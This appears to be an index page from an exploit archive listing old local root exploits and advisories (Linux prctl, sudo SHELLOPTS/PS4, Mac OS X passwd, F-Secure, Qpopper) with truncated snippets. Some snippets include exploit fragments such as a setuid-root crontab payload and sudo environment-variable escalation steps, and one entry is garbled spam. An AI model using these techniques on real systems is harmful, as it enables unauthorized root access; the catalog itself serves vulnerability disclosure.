prctl.sh.txt
!/bin/sh PRCTL local root exp By: Sunix + effected systems 2.6.13 /tmp/getsuid.c include include include include include include include char payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)
Exploit for linux platform in category local exploits ================================================================== Linux Kernel 2.6.13 /tmp/getsuid.c include include include include include include include char...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)
No description provided by source. / $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi [email protected] The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)
Exploit for linux platform in category local exploits ================================================================== Linux Kernel 2.6.13 = 2.6.13 prctl kernel exploit C Julien TINNES If you read the Changelog from 2.6.13 you've probably seen: PATCH setuid core dump This patch mainly adds...
FreeBSD : kpopup -- local root exploit and local denial of service (1613db79-8e52-11da-8426-000fea0a9611)
Mitre CVE reports : Format string vulnerability in main.cpp in kpopup 0.9.1-0.9.5pre2 allows local users to cause a denial of service segmentation fault and possibly execute arbitrary code via format string specifiers in command line arguments. misc.cpp in KPopup 0.9.1 trusts the PATH variable wh...
FreeBSD : openvpn -- LD_PRELOAD code execution on client through malicious or compromised server (be4ccb7b-c48b-11da-ae12-0002b3b60e4c)
Hendrik Weimer reports : OpenVPN clients are a bit too generous when accepting configuration options from a server. It is possible to transmit environment variables to client-side shell scripts. There are some filters in place to prevent obvious nonsense, however they don't catch the good old...
[SECURITY] [DSA 1040-1] New gdm packages fix local root exploit
-------------------------------------------------------------------------- Debian Security Advisory DSA 1040-1 [email protected] http://www.debian.org/security/ Martin Schulze April 24th, 2006 http://www.debian.org/security/faq -...
irix6local.txt
SGI IRIX 6.usr/sysadm/bin/runpriv draft resolution to be to complete at antecedence but to stoke seriously came ran ready-to-wear there is no need to explain in the interest of owners yonder protection them from geeks but whom need to make realize excellent. visit http://lezr.com/vb echo SGI IRIX...
Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
Exploit for macOS platform in category local exploits ================================================================= Apple Mac OS X /usr/bin/passwd Custom Passwd Local Root Exploit ================================================================= !/usr/bin/perl /usr/bin/passwdOSX: local root...
Apple Mac OSX - /usr/bin/passwd Custom Passwd Privilege Escalation
Apple Mac OSX - /usr/bin/passwd Custom Passwd Privilege Escalation !/usr/bin/perl /usr/bin/passwdOSX: local root exploit. by: vade79/v9 [email protected] fakehalo/realhalo Apple OSX's /usr/bin/passwd program has support for a custom passwd file to be used instead of the standard/static path. this featu...
Sudo 1.6.x - Environment Variable Handling Security Bypass (1)
source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A local attacker with the ability to run Python scripts can...
Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow
mercurysexywarez Okayokay THiS iS 0DAY!!! Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT PH SERVER since me and my folks didn't find enough wild targets, i release this pretty warez to the public :PP kcope kingcopeatgmx.net in 2005! JUUAREZ! Big thanx to...
fsigk_exp.py.txt
!/usr/bin/env python fsigkexp.py: F-Secure Internet Gatekeeper for Linux local root exploit acknowledgements: everyone in pure-elite and uDc. coded by: [email protected] http://xavsec.blogspot.com Make proper checks and import nessesary calls from modules. try: from sys import argv except...
Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
No description provided by source. Sudo local root escalation privilege vuln versions : sudo 1.6.8p10 by breno You need sudo access execution for some bash script Use csh shell to change SHELLOPTS env ie: %cat x.sh !/bin/bash -x echo "Getting root!!" % cat /etc/sudoers ... breno ALL=ALL...
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation
Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls -lisa egg 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 eg...
Operator Shell (osh) 1.7-14 Local Root Exploit
No description provided by source. !/bin/sh OSH 1.7-14 Exploit EDUCATIONAL purposes only.... :- by Charles Stevenson core [email protected] Description: The Operator Shell Osh is a setuid root, security enhanced, restricted shell. It allows the administrator to carefully limit the access of special...
[EXPL] F-Secure Internet Gatekeeper Local Root (Exploit)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit
Exploit for linux platform in category local exploits ==================================================================== F-Secure Internet Gatekeeper for linux 2.15.484 Local Root Exploit ==================================================================== !/usr/bin/env python F-Secure Anti-Vir...
Linux Kernel 2.4.x/2.6.x - Bluez BlueTooth Signed Buffer Index Privilege Escalation (2)
Linux Kernel 2.4.x2.6.x - Bluez BlueTooth Signed Buffer Index Privilege Escalation 2 / Due to many responses i've improved the exploit to cover more systems! ONGBAK v0.9 october 24th 05 """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o...
Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)
No description provided by source. !/bin/sh tested and working /str0ke Linux Qpopper poppassd latest version local r00t exploit by kcope August 2005 Confidential - Keep Private! POPPASSDPATH=/usr/local/bin/poppassd echo "" echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"...